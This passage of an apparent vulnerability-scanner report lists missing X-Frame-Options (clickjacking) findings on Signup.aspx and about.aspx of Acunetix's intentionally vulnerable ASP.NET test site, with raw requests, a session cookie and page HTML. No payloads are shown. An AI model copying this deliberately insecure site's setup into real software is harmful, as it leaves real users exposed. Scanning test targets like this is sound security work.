style="color:Black" title="December 15">15</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8385')" style="color:Black" title="December 16">16</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8386')" style="color:Black" title="December 17">17</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8387')" style="color:Black" title="December 18">18</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8388')" style="color:Black" title="December 19">19</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8389')" style="color:Black" title="December 20">20</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8390')" style="color:Black" title="December 21">21</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8391')" style="color:Black" title="December 22">22</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8392')" style="color:Black" title="December 23">23</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8393')" style="color:Black" title="December 24">24</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8394')" style="color:Black" title="December 25">25</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8395')" style="color:Black" title="December 26">26</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8396')" style="color:Black" title="December 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8397')" style="color:Black" title="December 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8398')" style="color:Black" title="December 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8399')" style="color:Black" title="December 30">30</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8400')" style="color:Black" title="December 31">31</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8401')" style="color:Black" title="January 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8402')" style="color:Black" title="January 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8403')" style="color:Black" title="January 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8404')" style="color:Black" title="January 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8405')" style="color:Black" title="January 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8406')" style="color:Black" title="January 06">6</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8407')" style="color:Black" title="January 07">7</a></td></tr> </table><BR> <a href="rssFeed.aspx">Get RSS feed</a> </TD> </TR> <TR> <TD colSpan="3"></TD> </TR> </TABLE> </form> </body> <div style="background-color:lightgray;width:40%;margin:auto;left:30%;position:fixed;bottom:2px;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:5%;padding-right:5%"><b>Warning</b>: This is not a blog. This is a test site for Acunetix. It is vulnerable to SQL Injections, Cross-site Scripting (XSS), and more. It was built using ASP.NET and it shows how bad programming leads to vulnerabilities. Do not visit the links in the comments. They are posted by malicious parties who are trying to exploit this site to their advantage. Comments are purged daily.</p> </div> </HTML>
URL	http://testaspnet.vulnweb.com/Signup.aspx
Method	GET
Parameter	X-Frame-Options
Attack
Evidence
Show / hide Request and Response
Request Header - size: 323 bytes.	GET http://testaspnet.vulnweb.com/Signup.aspx HTTP/1.1 Host: testaspnet.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; x64; rv:105.0esr) Gecko/20010101 Firefox/105.0esr Pragma: no-cache Cache-Control: no-cache Referer: http://testaspnet.vulnweb.com Cookie: ASP.NET_SessionId=3qnlyw45qx3ugzagkbwuyse5
Request Body - size: 0 bytes.
Response Header - size: 222 bytes.	HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/8.5 X-AspNet-Version: 2.0.50727 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 04:41:15 GMT Content-Length: 13106
Response Body - size: 13,106 bytes.	<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" > <HTML> <HEAD> <title>Signup</title> <meta name="GENERATOR" Content="Microsoft Visual Studio .NET 7.1"> <meta name="CODE_LANGUAGE" Content="C#"> <meta name="vs_defaultClientScript" content="JavaScript"> <meta name="vs_targetSchema" content="http://schemas.microsoft.com/intellisense/ie5"> <LINK href="styles.css" type="text/css" rel="stylesheet"> </HEAD> <body> <form name="Form1" method="post" action="Signup.aspx" id="Form1"> <div> <input type="hidden" name="__EVENTTARGET" id="__EVENTTARGET" value="" /> <input type="hidden" name="__EVENTARGUMENT" id="__EVENTARGUMENT" value="" /> <input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="/wEPDwUKLTY0MzI4NjU4Mw9kFgICAQ9kFgICAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkZLWF2wpV006tz0eDdoKfDbx+i81I" /> </div> <script type="text/javascript"> //<![CDATA[ var theForm = document.forms['Form1']; if (!theForm) { theForm = document.Form1; } function __doPostBack(eventTarget, eventArgument) { if (!theForm.onsubmit \|\| (theForm.onsubmit() != false)) { theForm.__EVENTTARGET.value = eventTarget; theForm.__EVENTARGUMENT.value = eventArgument; theForm.submit(); } } //]]> </script> <div> <input type="hidden" name="__VIEWSTATEGENERATOR" id="__VIEWSTATEGENERATOR" value="36F90C25" /> <input type="hidden" name="__EVENTVALIDATION" id="__EVENTVALIDATION" value="/wEWWgK42oW1DwLStq24BwK3jsrkBALF97vxAQL+kPzjAQLQp5LlBAKx0tH6DwKx0tH6DwKx0sWRBwKx0sWRBwKx0rn5BQKx0rn5BQKx0q2cDQKx0q2cDQKK+b8FAor5vwUCivnT2QkCivnT2QkCivnH/AICivnH/AICivn7kwoCivn7kwoCivnvtgMCivnvtgMCivmDzQwCivmDzQwCivm34AUCivm34AUCivmrhw0Civmrhw0Civmf7AsCivmf7AsCivmzgwMCivmzgwMCv5P/xAkCv5P/xAkCv5OTmwECv5OTmwECv5OHvgoCv5OHvgoCv5O71QMCv5O71QMCv5Ov6AwCv5Ov6AwCv5PDjAQCv5PDjAQCv5P3ow0Cv5P3ow0Cv5PrxgYCv5PrxgYCv5PfrwMCv5PfrwMCv5PzwgwCv5PzwgwCkLrd6w8CkLrd6w8CkLrxjgcCkLrxjgcCkLrlJQKQuuUlApC6mfgJApC6mfgJApC6jZ8BApC6jZ8BApC6obIKApC6obIKApC61dYDApC61dYDApC6ye0MApC6ye0MApC6vdUJApC6vdUJApC60ekCApC60ekCAtfZkJ4HAtfZkJ4HAtfZhDUC19mENQLX2bjICQLX2bjICQLX2azvAgLX2azvAgLX2cCDCgLX2cCDCgLX2fSmAwLX2fSmAwLX2ej9DALX2ej9DALX2ZyQBALX2ZyQBIIkG35ZBK5ERiGTc+mKdRBm3AUE" /> </div> <TABLE id="Table1" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD style="COLOR: #e6dccf" bgColor="#806640" height="75"><a href="https://www.acunetix.com/"><IMG src="images/logo_acunetix.gif" align="absMiddle" border="0" alt="Acunetix website security"></a></TD> <TD style="FONT-WEIGHT: bold; FONT-SIZE: small; COLOR: #e6dccf" align="right" bgColor="#806640" height="75">Test Website for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></TD> </TR> </TABLE> <TABLE id="Table2" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD class="MenuBar" style="BORDER-LEFT: #806040 1px solid"><A class="menu" title="About" href="about.aspx">about</A> <A class="menu" title="Latest news" href="default.aspx">news</A> <a href="login.aspx" id="MainMenu1_lnkLog" class="menu" name="lnkLog">login</a> <a href="Signup.aspx" id="MainMenu1_lnkSignup" class="menu" name="lnkSignup"> signup</a> <A class="menu" title="Network scanner" href="https://www.acunetix.com/vulnerability-scanner/network-vulnerability-scanner/">network scanner</A> <A class="menu" title="Network vuln help" href="https://www.acunetix.com/blog/articles/network-vulnerability-assessment-gotchas-avoid/">network vuln help</A> </TD> <td class="MenuBar" align="right" width="50px"> <A href="rssFeed.aspx"><IMG src="images/rss.gif" border="0"></A> </td> </TR> </TABLE> <TABLE id="Table1" cellSpacing="0" cellPadding="10" width="790" align="center" border="0"> <TR> <TD id="tdPageData" valign="top"> <TABLE id="Table2" cellSpacing="0" cellPadding="10" width="300" border="0" class="FramedForm" align="center"> <TR> <TD>Username:</TD> <TD> <input name="tbUsername" type="text" id="tbUsername" class="Login" /></TD> </TR> <TR> <TD>Password:</TD> <TD> <input name="tbPassword" type="password" id="tbPassword" class="Login" /></TD> </TR> <TR> <TD></TD> <TD align="right"> <input type="submit" name="btnSignup" value="Sign me up" id="btnSignup" /></TD> </TR> </TABLE> <BR> </TD> <TD vAlign="top" width="200"> <table id="RightPanel1_Calendar" class="Calendar" cellspacing="0" cellpadding="1" title="Calendar" border="0" style="background-color:#E6DCCF;border-width:1px;border-style:Solid;font-size:X-Small;border-collapse:collapse;"> <tr><td colspan="7" style="background-color:#E6B873;"><table class="Calendar" cellspacing="0" border="0" style="font-size:X-Small;font-weight:bold;width:100%;border-collapse:collapse;"> <tr><td style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8340')" style="color:Black" title="Go to the previous month"><</a></td><td align="center" style="width:70%;">December 2022</td><td align="right" style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8401')" style="color:Black" title="Go to the next month">></a></td></tr> </table></td></tr><tr><th align="center" abbr="Sunday" scope="col">Sun</th><th align="center" abbr="Monday" scope="col">Mon</th><th align="center" abbr="Tuesday" scope="col">Tue</th><th align="center" abbr="Wednesday" scope="col">Wed</th><th align="center" abbr="Thursday" scope="col">Thu</th><th align="center" abbr="Friday" scope="col">Fri</th><th align="center" abbr="Saturday" scope="col">Sat</th></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8366')" style="color:Black" title="November 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8367')" style="color:Black" title="November 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8368')" style="color:Black" title="November 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8369')" style="color:Black" title="November 30">30</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8370')" style="color:Black" title="December 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8371')" style="color:Black" title="December 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8372')" style="color:Black" title="December 03">3</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8373')" style="color:Black" title="December 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8374')" style="color:Black" title="December 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8375')" style="color:Black" title="December 06">6</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8376')" style="color:Black" title="December 07">7</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8377')" style="color:Black" title="December 08">8</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8378')" style="color:Black" title="December 09">9</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8379')" style="color:Black" title="December 10">10</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8380')" style="color:Black" title="December 11">11</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8381')" style="color:Black" title="December 12">12</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8382')" style="color:Black" title="December 13">13</a></td><td align="center" style="border-color:#806640;width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8383')" style="color:Black" title="December 14">14</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8384')" style="color:Black" title="December 15">15</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8385')" style="color:Black" title="December 16">16</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8386')" style="color:Black" title="December 17">17</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8387')" style="color:Black" title="December 18">18</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8388')" style="color:Black" title="December 19">19</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8389')" style="color:Black" title="December 20">20</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8390')" style="color:Black" title="December 21">21</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8391')" style="color:Black" title="December 22">22</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8392')" style="color:Black" title="December 23">23</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8393')" style="color:Black" title="December 24">24</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8394')" style="color:Black" title="December 25">25</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8395')" style="color:Black" title="December 26">26</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8396')" style="color:Black" title="December 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8397')" style="color:Black" title="December 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8398')" style="color:Black" title="December 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8399')" style="color:Black" title="December 30">30</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8400')" style="color:Black" title="December 31">31</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8401')" style="color:Black" title="January 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8402')" style="color:Black" title="January 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8403')" style="color:Black" title="January 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8404')" style="color:Black" title="January 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8405')" style="color:Black" title="January 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8406')" style="color:Black" title="January 06">6</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8407')" style="color:Black" title="January 07">7</a></td></tr> </table><BR> <a href="rssFeed.aspx">Get RSS feed</a> </TD> </TR> <TR> <TD colSpan="2"> </TD> </TR> </TABLE> </form> </body> <div style="background-color:lightgray;width:40%;margin:auto;position:absolute;left:30%;bottom:2px;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:5%;padding-right:5%"><b>Warning</b>: This is not a blog. This is a test site for Acunetix. It is vulnerable to SQL Injections, Cross-site Scripting (XSS), and more. It was built using ASP.NET and it shows how bad programming leads to vulnerabilities. Do not visit the links in the comments. They are posted by malicious parties who are trying to exploit this site to their advantage. Comments are purged daily.</p> </div> </HTML>
URL	http://testaspnet.vulnweb.com/about.aspx
Method	POST
Parameter	X-Frame-Options
Attack
Evidence
Show / hide Request and Response
Request Header - size: 404 bytes.	POST http://testaspnet.vulnweb.com/about.aspx HTTP/1.1 Host: testaspnet.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; x64; rv:105.0esr) Gecko/20010101 Firefox/105.0esr Pragma: no-cache Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded Referer: http://testaspnet.vulnweb.com/about.aspx Content-Length: 981 Cookie: ASP.NET_SessionId=3qnlyw45qx3ugzagkbwuyse5
Request Body - size: 981 bytes.	__EVENTTARGET=&__EVENTARGUMENT=&__VIEWSTATE=%2FwEPDwUKLTEwNTI0MjkwNQ9kFgICAQ9kFgICAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkZLDaiLtIJBFGHdHW8BBidJDZ856t&__VIEWSTATEGENERATOR=E809BCA5&__EVENTVALIDATION=%2FwEWVwKqq9H0CQL%2BkPzjAQLQp5LlBAKx0tH6DwKx0tH6DwKx0sWRBwKx0sWRBwKx0rn5BQKx0rn5BQKx0q2cDQKx0q2cDQKK%2Bb8FAor5vwUCivnT2QkCivnT2QkCivnH%2FAICivnH%2FAICivn7kwoCivn7kwoCivnvtgMCivnvtgMCivmDzQwCivmDzQwCivm34AUCivm34AUCivmrhw0Civmrhw0Civmf7AsCivmf7AsCivmzgwMCivmzgwMCv5P%2FxAkCv5P%2FxAkCv5OTmwECv5OTmwECv5OHvgoCv5OHvgoCv5O71QMCv5O71QMCv5Ov6AwCv5Ov6AwCv5PDjAQCv5PDjAQCv5P3ow0Cv5P3ow0Cv5PrxgYCv5PrxgYCv5PfrwMCv5PfrwMCv5PzwgwCv5PzwgwCkLrd6w8CkLrd6w8CkLrxjgcCkLrxjgcCkLrlJQKQuuUlApC6mfgJApC6mfgJApC6jZ8BApC6jZ8BApC6obIKApC6obIKApC61dYDApC61dYDApC6ye0MApC6ye0MApC6vdUJApC6vdUJApC60ekCApC60ekCAtfZkJ4HAtfZkJ4HAtfZhDUC19mENQLX2bjICQLX2bjICQLX2azvAgLX2azvAgLX2cCDCgLX2cCDCgLX2fSmAwLX2fSmAwLX2ej9DALX2ej9DALX2ZyQBALX2ZyQBMr7fvEMmSiYYPLDantQRZkqAblw
Response Header - size: 222 bytes.	HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/8.5 X-AspNet-Version: 2.0.50727 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 04:41:16 GMT Content-Length: 14619
Response Body - size: 14,619 bytes.	<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" > <HTML> <HEAD> <title>About</title> <meta name="GENERATOR" Content="Microsoft Visual Studio .NET 7.1"> <meta name="CODE_LANGUAGE" Content="C#"> <meta name="vs_defaultClientScript" content="JavaScript"> <meta name="vs_targetSchema" content="http://schemas.microsoft.com/intellisense/ie5"> <LINK href="styles.css" type="text/css" rel="stylesheet"> </HEAD> <body> <form name="Form1" method="post" action="about.aspx" id="Form1"> <div> <input type="hidden" name="__EVENTTARGET" id="__EVENTTARGET" value="" /> <input type="hidden" name="__EVENTARGUMENT" id="__EVENTARGUMENT" value="" /> <input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="/wEPDwUKLTEwNTI0MjkwNQ9kFgICAQ9kFgICAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkZLDaiLtIJBFGHdHW8BBidJDZ856t" /> </div> <script type="text/javascript"> //<![CDATA[ var theForm = document.forms['Form1']; if (!theForm) { theForm = document.Form1; } function __doPostBack(eventTarget, eventArgument) { if (!theForm.onsubmit \|\| (theForm.onsubmit() != false)) { theForm.__EVENTTARGET.value = eventTarget; theForm.__EVENTARGUMENT.value = eventArgument; theForm.submit(); } } //]]> </script> <div> <input type="hidden" name="__VIEWSTATEGENERATOR" id="__VIEWSTATEGENERATOR" value="E809BCA5" /> <input type="hidden" name="__EVENTVALIDATION" id="__EVENTVALIDATION" value="/wEWVwKqq9H0CQL+kPzjAQLQp5LlBAKx0tH6DwKx0tH6DwKx0sWRBwKx0sWRBwKx0rn5BQKx0rn5BQKx0q2cDQKx0q2cDQKK+b8FAor5vwUCivnT2QkCivnT2QkCivnH/AICivnH/AICivn7kwoCivn7kwoCivnvtgMCivnvtgMCivmDzQwCivmDzQwCivm34AUCivm34AUCivmrhw0Civmrhw0Civmf7AsCivmf7AsCivmzgwMCivmzgwMCv5P/xAkCv5P/xAkCv5OTmwECv5OTmwECv5OHvgoCv5OHvgoCv5O71QMCv5O71QMCv5Ov6AwCv5Ov6AwCv5PDjAQCv5PDjAQCv5P3ow0Cv5P3ow0Cv5PrxgYCv5PrxgYCv5PfrwMCv5PfrwMCv5PzwgwCv5PzwgwCkLrd6w8CkLrd6w8CkLrxjgcCkLrxjgcCkLrlJQKQuuUlApC6mfgJApC6mfgJApC6jZ8BApC6jZ8BApC6obIKApC6obIKApC61dYDApC61dYDApC6ye0MApC6ye0MApC6vdUJApC6vdUJApC60ekCApC60ekCAtfZkJ4HAtfZkJ4HAtfZhDUC19mENQLX2bjICQLX2bjICQLX2azvAgLX2azvAgLX2cCDCgLX2cCDCgLX2fSmAwLX2fSmAwLX2ej9DALX2ej9DALX2ZyQBALX2ZyQBMr7fvEMmSiYYPLDantQRZkqAblw" /> </div> <TABLE id="Table1" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD style="COLOR: #e6dccf" bgColor="#806640" height="75"><a href="https://www.acunetix.com/"><IMG src="images/logo_acunetix.gif" align="absMiddle" border="0" alt="Acunetix website security"></a></TD> <TD style="FONT-WEIGHT: bold; FONT-SIZE: small; COLOR: #e6dccf" align="right" bgColor="#806640" height="75">Test Website for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></TD> </TR> </TABLE> <TABLE id="Table2" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD class="MenuBar" style="BORDER-LEFT: #806040 1px solid"><A class="menu" title="About" href="about.aspx">about</A> <A class="menu" title="Latest news" href="default.aspx">news</A> <a href="login.aspx" id="MainMenu1_lnkLog" class="menu" name="lnkLog">login</a> <a href="Signup.aspx" id="MainMenu1_lnkSignup" class="menu" name="lnkSignup"> signup</a> <A class="menu" title="Network scanner" href="https://www.acunetix.com/vulnerability-scanner/network-vulnerability-scanner/">network scanner</A> <A class="menu" title="Network vuln help" href="https://www.acunetix.com/blog/articles/network-vulnerability-assessment-gotchas-avoid/">network vuln help</A> </TD> <td class="MenuBar" align="right" width="50px"> <A href="rssFeed.aspx"><IMG src="images/rss.gif" border="0"></A> </td> </TR> </TABLE> <TABLE id="Table1" cellSpacing="0" cellPadding="10" width="790" align="center" border="0"> <TR> <TD id="tdPageData" valign="top"> <h1>About this website</h1> <p>The website was built with the intention to test the Acunetix Web Vulnerability Scanner. For this reason this website have <b>lot of bugs</b> to demonstrate the forementioned software's capabilities to find those bugs.</p> <p><b>Please DO NOT use this website as a blog or news site. DO NOT post any sensitive information on this site. This includes e-mail addresses or real names.</b></p> <h1>About Acunetix</h1> <P><B>Combating the web vulnerability threat<BR> </B>Securing a company's web applications is today's most overlooked aspect of securing the enterprise. Web application hacking is on the rise with as many as 75% of cyber attacks done at web application level or via the web. Most corporations have secured their data at the network level, but have overlooked the crucial step of checking whether their web applications are vulnerable to attack. Web applications, which often have a direct line into the company's most valuable data assets, are online 24/7, completely unprotected by a firewall and therefore easy prey for attackers.</P> <P>Acunetix was founded with this threat in mind. We realised the only way to combat web site hacking was to develop an automated tool that could help companies scan their web applications for vulnerabilities. In July 2005, Acunetix Web Vulnerability Scanner was released - a tool that crawls the website for vulnerabilities to SQL injection, cross site scripting and other web attacks before hackers do.</P> <P>The Acunetix development team consists of highly experienced security developers who have each spent years developing network security scanning software prior to starting development on Acunetix WVS. The management team is backed by years of experience marketing and selling security software.</P> <P>Acunetix is a privately held company with its <A href="https://www.acunetix.com/company/contact/"> offices</A> in Malta, US and the UK. </P> </TD> <TD vAlign="top" width="200"> <table id="RightPanel1_Calendar" class="Calendar" cellspacing="0" cellpadding="1" title="Calendar" border="0" style="background-color:#E6DCCF;border-width:1px;border-style:Solid;font-size:X-Small;border-collapse:collapse;"> <tr><td colspan="7" style="background-color:#E6B873;"><table class="Calendar" cellspacing="0" border="0" style="font-size:X-Small;font-weight:bold;width:100%;border-collapse:collapse;"> <tr><td style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8340')" style="color:Black" title="Go to the previous month"><</a></td><td align="center" style="width:70%;">December 2022</td><td align="right" style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8401')" style="color:Black" title="Go to the next month">></a></td></tr> </table></td></tr><tr><th align="center" abbr="Sunday" scope="col">Sun</th><th align="center" abbr="Monday" scope="col">Mon</th><th align="center" abbr="Tuesday" scope="col">Tue</th><th align="center" abbr="Wednesday" scope="col">Wed</th><th align="center" abbr="Thursday" scope="col">Thu</th><th align="center" abbr="Friday" scope="col">Fri</th><th align="center" abbr="Saturday" scope="col">Sat</th></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8366')" style="color:Black" title="November 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8367')" style="color:Black" title="November 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8368')" style="color:Black" title="November 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8369')" style="color:Black" title="November 30">30</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8370')" style="color:Black" title="December 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8371')" style="color:Black" title="December 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8372')" style="color:Black" title="December 03">3</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8373')" style="color:Black" title="December 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8374')" style="color:Black" title="December 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8375')" style="color:Black" title="December 06">6</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8376')" style="color:Black" title="December 07">7</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8377')" style="color:Black" title="December 08">8</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8378')" style="color:Black" title="December 09">9</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8379')" style="color:Black" title="December 10">10</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8380')" style="color:Black" title="December 11">11</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8381')" style="color:Black" title="December 12">12</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8382')" style="color:Black" title="December 13">13</a></td><td align="center" style="border-color:#806640;width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8383')" style="color:Black" title="December 14">14</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8384')" style="color:Black" title="December 15">15</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8385')" style="color:Black" title="December 16">16</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8386')" style="color:Black" title="December 17">17</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8387')" style="color:Black" title="December 18">18</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8388')" style="color:Black" title="December 19">19</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8389')" style="color:Black" title="December 20">20</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8390')" style="color:Black" title="December 21">21</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8391')" style="color:Black" title="December 22">22</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8392')" style="color:Black" title="December 23">23</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8393')" style="color:Black" title="December 24">24</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8394')" style="color:Black" title="December 25">25</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8395')" style="color:Black" title="December 26">26</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8396')" style="color:Black" title="December 27">27</a></td><td align="center" style="width:14%;"><a 